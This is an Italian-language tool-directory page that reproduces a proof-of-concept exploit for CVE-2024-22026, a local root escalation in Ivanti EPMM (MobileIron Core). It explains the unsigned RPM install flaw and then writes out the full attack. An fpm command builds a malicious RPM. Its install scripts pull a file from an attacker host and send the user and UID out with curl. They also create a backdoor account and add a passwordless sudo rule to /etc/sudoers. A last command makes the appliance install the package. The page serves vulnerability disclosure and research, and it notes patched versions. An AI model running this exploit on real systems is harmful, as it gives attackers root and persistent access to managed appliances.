Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-22026 — Exploit POC per CVE-2024-22026 che colpisce Ivanti EPMM "MobileIron Core" | Kitploit
Strumenti/GitHubGitHub/securekomodo/cve-2024-22026
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitPaper e RicercaApprendimento e Formazione
GitHubsecurekomodo/cve-2024-22026

CVE-2024-22026

Exploit POC per CVE-2024-22026 che colpisce Ivanti EPMM "MobileIron Core"

Vedi Repository
1542 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-22026

PoC di sfruttamento per CVE-2024-22026 che interessa Ivanti EPMM "MobileIron Core" image

CVE-2024-22026 è una vulnerabilità di escalation dei privilegi locale nei server Ivanti EPMM (precedentemente MobileIron) precedenti alle versioni 12.1.0.0, 12.0.0.0 e 11.12.0.1. Questa vulnerabilità consente a un utente locale di ottenere accesso di root al sistema sfruttando il processo di aggiornamento del software con un pacchetto RPM dannoso proveniente da un URL remoto.

Leggi l'articolo completo per informazioni tecniche dettagliate: Exploiting CVE-2024-22026: Rooting Ivanti EPMM (MobileIron Core)

Dettagli della vulnerabilità

  • ID CVE: CVE-2024-22026
  • Gravità: Non determinata
  • Vettore di attacco: Locale
  • Impatto: Consente a un utente locale di ottenere accesso di root
  • Versioni interessate: Versioni del server Ivanti EPMM (precedentemente MobileIron) precedenti alla 12.1.0.0, 12.0.0.0 e 11.12.0.1
  • Disponibilità della patch: Corretto nelle versioni 12.1.0.0, 12.0.0.0 e 11.12.0.1

Scoperta

Durante la nostra ricerca, abbiamo scoperto che l'appliance utilizza il seguente comando per scaricare e installare pacchetti RPM come utente con privilegi bassi:

root@kitploit:~
install rpm url <remote url>

Il comando precedente è solo un wrapper CLI per la seguente operazione che viene eseguita come root

root@kitploit:~
/bin/rpm -Uvh *.rpm

Questo comando rpm sottostante non applica alcuna verifica delle firme né filtro degli URL, il che significa che qualsiasi pacchetto RPM può essere installato. Ciò consente a un aggressore di creare e distribuire un pacchetto RPM dannoso in grado di compromettere l'appliance.

PoC di sfruttamento

Creazione dell'RPM dannoso

Il seguente comando viene utilizzato per creare un pacchetto RPM dannoso:

root@kitploit:~
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

Script di preinstallazione (preinstall.sh)

root@kitploit:~
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0

Script di postinstallazione (postinstall.sh)

root@kitploit:~
#!/bin/sh
set -e  # Enable strict error checking

# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
  echo "Failed to add user 'exploit-poc'" >&2
  exit 1
fi

echo "exploit-poc:<redacted_password>" | chpasswd

# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
  echo "Failed to modify sudoers file" >&2
  exit 1
fi

exit 0

Esecuzione del comando CLI per recuperare l'RPM

Per sfruttare la vulnerabilità, l'aggressore eseguirebbe il seguente comando nella CLI per scaricare e installare l'RPM dannoso:

root@kitploit:~
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm

Mitigazione

Ivanti ha rilasciato patch per risolvere CVE-2024-22026 nelle seguenti versioni:

  • 12.1.0.0
  • 12.0.0.0
  • 11.12.0.1

Disclaimer

Questa repository e il suo contenuto sono destinati esclusivamente a scopi didattici e di ricerca. L'uso delle informazioni qui contenute è a proprio rischio.

Scarica lo strumento